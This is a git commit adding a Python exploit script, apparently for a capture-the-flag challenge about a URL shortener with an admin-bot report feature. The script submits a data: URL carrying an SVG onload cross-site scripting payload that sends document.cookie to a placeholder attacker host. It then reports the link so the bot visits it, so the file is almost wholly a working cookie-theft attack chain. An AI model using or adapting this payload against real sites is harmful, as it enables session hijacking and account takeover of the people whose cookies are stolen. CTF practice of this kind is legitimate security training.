updating
This commit is contained in:
25
catthegray25/ezpz/dist-oops/exploit.py
Normal file
25
catthegray25/ezpz/dist-oops/exploit.py
Normal file
@@ -0,0 +1,25 @@
|
||||
import requests
|
||||
|
||||
ATTACKER_HOST = "http://your.attacker.com/log"
|
||||
TARGET = "http://target-ctf.com"
|
||||
|
||||
# Step 1: Create a shortened URL with a malicious payload
|
||||
payload_url = f"data:text/html,<svg onload=fetch('{ATTACKER_HOST}?c='+document.cookie)>"
|
||||
|
||||
res = requests.post(f"{TARGET}/", data={"original_url": payload_url})
|
||||
assert res.ok
|
||||
print("[+] Shortened URL submitted")
|
||||
|
||||
# Step 2: Extract short code from the response
|
||||
from bs4 import BeautifulSoup
|
||||
soup = BeautifulSoup(res.text, "html.parser")
|
||||
short_link = soup.find("input", {"id": "shortened"})["value"]
|
||||
short_code = short_link.split("/")[-1]
|
||||
|
||||
# Step 3: Submit to /report endpoint
|
||||
report_res = requests.post(f"{TARGET}/report", data={"submit_id": short_link})
|
||||
if report_res.ok:
|
||||
print(f"[+] Reported to bot: {short_link}")
|
||||
else:
|
||||
print("[-] Report failed")
|
||||
|
||||
Reference in New Issue
Block a user